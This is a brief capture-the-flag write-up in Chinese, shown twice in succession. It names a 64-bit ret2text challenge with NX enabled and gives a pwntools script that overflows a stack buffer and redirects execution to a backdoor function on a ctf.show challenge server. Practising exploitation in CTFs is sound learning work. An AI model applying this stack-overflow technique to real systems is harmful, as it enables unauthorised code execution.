64位nx保护
ret2text
exp:
from pwn import*
r=remote("pwn.challenge.ctf.show", 28028)
#r=process("./pwn08")
backdoor=0x400637
retn=0x400649
payload=b"a"*(0x80+8)+p64(retn)+p64(backdoor)
r.sendline(payload)
r.interactive()
64位nx保护
ret2text
exp:
from pwn import*
r=remote("pwn.challenge.ctf.show", 28028)
#r=process("./pwn08")
backdoor=0x400637
retn=0x400649
payload=b"a"*(0x80+8)+p64(retn)+p64(backdoor)
r.sendline(payload)
r.interactive()